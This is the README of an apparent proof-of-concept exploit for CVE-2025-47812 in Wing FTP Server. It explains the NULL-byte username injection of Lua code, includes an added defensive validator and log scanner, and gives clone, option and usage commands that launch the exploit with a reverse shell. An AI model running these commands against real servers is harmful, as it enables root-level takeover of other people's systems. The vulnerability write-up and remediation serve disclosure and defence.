CVE-2025-47812: Improper input validation leading to remote code execution and full system compromise


📘 Introduction:

Julien Ahrens from RCE Security discovered a critical security vulnerability affecting Wing FTP Server. Tracked as CVE-2025-47812, the vulnerability has a CVSS score of 10.0. Successful exploitation may allow a remote, unauthenticated attacker to execute arbitrary code, leading to complete system compromise.

Wing FTP Server is cross-platform, user-friendly, and secure FTP server software. It supports multiple file transfer protocols, such as FTP, FTPS, HTTP, HTTPS, and SFTP, allowing flexibility for client connections.

To research CVE-2025-47812, I deployed a Docker container running Wing FTP Server 7.4.3 on a Linux host. The container was configured to expose the web interface, and I enabled anonymous login for easier unauthenticated testing. Additionally, a test user account (dev-test:test) was created to simulate authenticated scenarios. This setup provided a safe and controlled environment to reproduce the vulnerability and validate exploit behavior.

🚨 Vulnerability Summary:

  • CVE ID: CVE-2025-47812

  • CVSS v3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

  • Base Score: 10.0 (Critical)

  • Affected Software: Wing FTP Server <= 7.4.3

  • Impact: Remote code execution leading to full system compromise.

  • Exploitation Prerequisites:

    • Anonymous login enabled, or valid user credentials

    • No sudo permissions required for the user

🧪 Exploit Description:

When a user tries to log in, the server calls c_CheckUser, which always returns OK_CHECK_CONNECTION regardless of what follows a NULL byte in the username, as long as the string before the NULL byte matches an existing user. An attacker may exploit this by appending a NULL byte and extra data to a known username to bypass the password check. The server uses strlen() to determine the length of the supplied username, but strlen() only counts characters up to the NULL-byte terminator, so only that prefix is compared against the user database while the full, unsanitized username is retained.

The unsanitized username (including the injected NULL byte and the payload that follows it) is written directly into the session file as Lua code. These session files are Lua scripts (.lua) and are executed when the session is loaded. On Linux, Wing FTP Server runs as root; on Windows, it runs as SYSTEM. The injected Lua payload therefore runs with full privileges when the session is reloaded.

Note: this behaviour only occurs when no password is set for the user (e.g. anonymous) or when valid credentials are supplied. If a password is set for the user, strict password validation is enforced.
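The following is an added defensive example, not code from this repository or from Wing FTP Server. It contrasts a strlen()-style lookup, which sees only the bytes before the first NULL byte, with a hardened validator that rejects NULL and control bytes outright, and adds a small scanner that flags NULL-byte-smuggled usernames in HTTP access logs. The user list, log format, endpoint path and log lines are all constructed for illustration.

```python
"""
Added example (not part of the original repository): a hardened
username validator and an access-log scanner for NULL-byte smuggling.
KNOWN_USERS, the /login path and SAMPLE_LOG are constructed stand-ins.
"""
import re
from urllib.parse import parse_qs

# Constructed stand-in for the server's account database.
KNOWN_USERS = {"anonymous", "dev-test"}


def strlen_style_lookup(username: bytes) -> bool:
    """Models the flawed check described above: a C strlen()/strcmp()
    pair only sees the bytes before the first NUL, so any suffix after
    it is ignored during the account lookup and the check passes."""
    prefix = username.split(b"\x00", 1)[0]
    return prefix.decode("latin-1") in KNOWN_USERS


def validate_username(username: bytes) -> tuple[bool, str]:
    """Hardened check: treat the input as a byte string of explicit
    length, reject NUL and control bytes before any comparison, and
    require the whole string to match a known account."""
    if b"\x00" in username:
        return False, "embedded NUL byte"
    if any(c < 0x20 or c == 0x7F for c in username):
        return False, "control character"
    if not username.isascii() or not (1 <= len(username) <= 64):
        return False, "bad length or non-ASCII"
    if username.decode("ascii") not in KNOWN_USERS:
        return False, "unknown user"
    return True, "ok"


# Constructed access-log lines. Request bodies are appended as a query
# string so the example runs offline; real logs rarely include bodies,
# so the same check would normally run in the application or a WAF.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2025:10:00:01] "POST /login HTTP/1.1" 200 '
    'username=dev-test&password=test',
    '10.0.0.7 - - [01/Jan/2025:10:00:03] "GET /index.html HTTP/1.1" 200 -',
    '10.0.0.9 - - [01/Jan/2025:10:00:07] "POST /login HTTP/1.1" 200 '
    'username=anonymous%00INJECTED&password=',
    'garbage line that does not parse',
]

LOG_RE = re.compile(
    r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<body>.*)$'
)


def find_null_byte_logins(lines):
    """Return (client_ip, decoded_username) for every login request
    whose username parameter decodes to a value containing a NUL byte.
    parse_qs percent-decodes %00 to '\\x00', which is what we look for."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or m["method"] != "POST":
            continue
        params = parse_qs(m["body"], keep_blank_values=True)
        for user in params.get("username", []):
            if "\x00" in user:
                hits.append((m["ip"], user))
    return hits


if __name__ == "__main__":
    smuggled = b"anonymous\x00INJECTED"
    print("strlen-style lookup accepts:", strlen_style_lookup(smuggled))
    print("hardened validator:", validate_username(smuggled))
    for ip, user in find_null_byte_logins(SAMPLE_LOG):
        print(f"ALERT {ip}: NUL byte in username {user!r}")
```

The validator deliberately checks the raw byte string rather than a decoded Python str, because the defect the write-up describes lives in the length calculation; rejecting NUL and control bytes before any comparison is the fix, and the log scanner gives a way to spot attempts against hosts that have not yet been upgraded.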

⚒️ Install:

    git clone https://github.com/pevinkumar10/CVE-2025-47812
    cd CVE-2025-47812
    pip3 install -r requirements.txt

Options:

    Options:
        -t, --target     Target Wing FTP Server URL (e.g., http://192.168.1.100)
        -u, --username   Username to authenticate as (default: anonymous)
        -p, --password   Password to authenticate with (default: empty)
        -lh, --lhost     Local host to listen on for the reverse shell (default: 127.0.0.1)
        -lp, --lport     Local port to listen on for the reverse shell (default: 31337)
        -ns, --no-shell  Do not spawn the temporary shell (a listener must then be started manually)
        -v, --verbose    Enable verbose/debug output
        -h, --help       Show this help message and exit

🎯 Exploitation:

[Screenshot: CVE-2025-47812 - Wing FTP Server unauthenticated RCE]

[Screenshot: CVE-2025-47812 - Wing FTP Server authenticated RCE (dev-test:test)]

Example usage:

    python3 exploit.py --target http://172.17.0.2 --lhost 172.17.0.1 --lport 31336

🛡️ Remediation:

  • Users must upgrade to WingFTP version 7.4.4 to patch the vulnerability.

  • Please refer to the WingFTP Release Notes for more information.

📜 Reference & Credit:

Note: I used the above reference for research purposes and updated the exploit with more features and robust error handling.

⚖️ License:

This Python PoC is released under the MIT License. The original exploit concept and disclosure credit belong to the Stratascale Cyber Research Unit.
